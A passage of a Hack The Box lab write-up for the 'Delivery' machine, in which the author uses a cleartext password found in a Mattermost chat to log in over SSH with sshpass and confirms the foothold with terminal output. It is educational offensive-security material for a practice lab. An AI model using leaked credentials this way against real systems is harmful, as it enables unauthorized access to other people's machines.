SSH
A temporary email ending with @delivery.htb, assigned to the opened ticket for modification allowed me to access the communication platform, which functions much like an inbox. I was then able to exploit this mechanism in order to gain access to the organization’s Mattermost chatroom that had 2 messages sent from the root user. One of the messages contains a CLEARTEXT credential, and I will be testing it out against the target SSH service.
┌──(kali㉿kali)-[~/archive/htb/labs/delivery]
└─$ sshpass -p 'Youve_G0t_Mail!' ssh maildeliverer@$IP
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5
maildeliverer@delivery:~$ whoami
maildeliverer
maildeliverer@delivery:~$ hostname
Delivery
maildeliverer@delivery:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:3d:c4 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.222/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:3dc4/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb9:3dc4/64 scope link
valid_lft forever preferred_lft foreverIt was a system credential.
Initial Foothold established to the target system as the maildeliverer user via SSH